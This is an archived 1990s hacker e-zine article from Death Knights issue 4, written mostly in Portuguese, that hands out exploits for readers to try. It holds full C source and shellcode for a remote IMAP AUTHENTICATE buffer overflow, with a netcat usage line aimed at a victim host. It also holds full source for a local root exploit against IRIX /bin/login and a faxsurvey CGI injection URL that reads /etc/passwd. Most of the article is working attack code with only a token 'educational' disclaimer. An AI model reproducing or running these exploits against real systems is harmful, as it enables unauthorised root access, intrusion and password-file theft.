Copy Link
Add to Bookmark
Report

Exploits - CGI & Stuff

Death Knights Issue 4

eZine's profile picture
Published in 
Death Knights
 · 2 years ago

by ReNeGaDe

Mais uma para voces! Para tentar um exploit, e' melhor ter uma conta no seu alvo (se possivel). Aqui irao alguns poucos exploits pra voce se divertir! E tambem ah falha de cgi para get passwd do faxsurvey.


1) Exploit para novo bug do imap..

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx------- 

/*
* Here goes another imap remote exploit
* The Death Knights www.deathknights.com
* by ReNeGaDe - ReNeGaDe@DeathKnights.com
*
* hey kiddies, it's 4 linux ! :)
* play around but be nice and careful - test it only against your own machine
* this code is only for educational purpose.
*
* renegade:~# (./imaprulez 100; cat) | nc victim.org 143
* (you can provide an offset or use the default 100)
*
* thanks for c0nd0r - condor@uground.org
*
* this code is heavly based on Cheez Whiz code
* So give him the credit : cheezbeast@hotmail.com
* I just found out the esp and fix things up
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN (2*1024)
#define NOP 0x90

char shell[] =
"\xeb\x34\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07"
"\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x7f"
"\x20\x46\x01\x20\x46\x02\x20\x46\x03\x20\x46\x05\x20\x46\x06"
"\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xc7\xff\xff\xff"
"\x2f\xe2\xe9\xee\x2f\xf3\xe8\x01\x01\x01\x01\x02\x02\x02\x02"
"\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset;

void
main (int argc, char *argv[])
{
int i;

nop = 403; offset = 100;
if (argc > 2) nop = atoi(argv[2]);
if (argc > 1) offset = atoi(argv[1]);
esp = 0xbffff501;

memset(buf, NOP, BUFLEN);
memcpy(buf+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4)
*((int *) &buf[i]) = esp + offset;

printf("* AUTHENTICATE {%d}\r\n", BUFLEN);
for (i = 0; i < BUFLEN; i++)
putchar(buf[i]);
printf("\r\n");

return;
}

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

2) Um buffer overflow para voce! Em /bin/login.

O que acontece usuarios locais podem pegar root access. Sistemas vulneraveis Irix 5.3 Irix64 6.2 Irix 6.3.
Solucao temporaria: chmod u-s /bin/login
Compile o exploit usando '-n32' flag pra compiling under 6.x

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx------- 

/* /bin/login exploit by DCRH 24/5/97
*
* The Death Knights www.deathknights.com
* by ReNeGaDe - ReNeGaDe@DeathKnights.com
*
* Tested on: R3000 Indigo (Irix 5.3)
* R4400 Indy (Irix 5.3)
* R5000 O2 (Irix 6.3)
* R8000 Power Challenge (Irix 6.2)
*
* Compile as: cc -n32 login.c (for Irix 6.x)
* cc login.c (for Irix 5.x)
*
* Press enter when prompted for a password
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH 200
#define EXTRA 300
#define OFFSET 0x1b0
#define IRIX_NOP 0x03e0f825 /* move $ra,$ra */

#define u_long unsigned


u_long get_sp_code[] = {
0x03a01025, /* move $v0,$sp */
0x03e00008, /* jr $ra */
0x00000000, /* nop */
};

u_long irix_shellcode[] = {
0x24041234, /* li $4,0x1234 */
0x2084edcc, /* sub $4,0x1234 */
0x0491fffe, /* bgezal $4,pc-4 */
0x03bd302a, /* sgt $6,$sp,$sp */
0x23e4012c, /* addi $4,$31,264+36 */
0xa086feff, /* sb $6,-264+7($4) */
0x2084fef8, /* sub $4,264 */
0x20850110, /* addi $5,$4,264+8 */
0xaca4fef8, /* sw $4,-264($5) */
0xaca6fefc, /* sw $4,-260($5) */
0x20a5fef8, /* sub $5, 264 */
0x240203f3, /* li $v0,1011 */
0x03ffffcc, /* syscall 0xfffff */
0x2f62696e, /* "/bin" */
0x2f7368ff, /* "/sh" */
};

char buf[BUF_LENGTH + EXTRA + 8];

void main(int argc, char **argv)
{
char *env[] = {NULL};
u_long targ_addr, stack;
u_long *long_p;
int i, code_length = strlen((char *)irix_shellcode)+1;
u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

stack = get_sp();

long_p =(u_long *) buf;
targ_addr = stack + OFFSET;

if (argc > 1)
targ_addr += atoi(argv[1]);

while ((targ_addr & 0xff000000) == 0 ||
(targ_addr & 0x00ff0000) == 0 ||
(targ_addr & 0x0000ff00) == 0 ||
(targ_addr & 0x000000ff) == 0)
targ_addr += 4;

for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = IRIX_NOP;

for (i = 0; i < code_length/sizeof(u_long); i++)
*long_p++ = irix_shellcode[i];

for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = (targ_addr << 24) | (targ_addr >> 8);

*long_p = 0;

printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);

execle("/bin/login", "login", "-h", &buf[1], 0, env);
perror("execl failed");
}

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

3) Falha de cgi no 'faxsurvey' CGI-Script...

"http://vitima.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd"

Eh isso ae pessoal aqui se encerram minhas materias nessa TDK!

Se tiverem interesse em tirar duvidas ou apresentar novas ideias, aqui estah o meu email. Mais sem babozeiras hein pessoal vamos ter um bom senso pois nao sou desocupado.

cya l8er!

ReNeGaDe               renegade@deathknights.com 
`'`'`'`' `'`'`'`'`'`'`'`'`'`'`'`'`

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT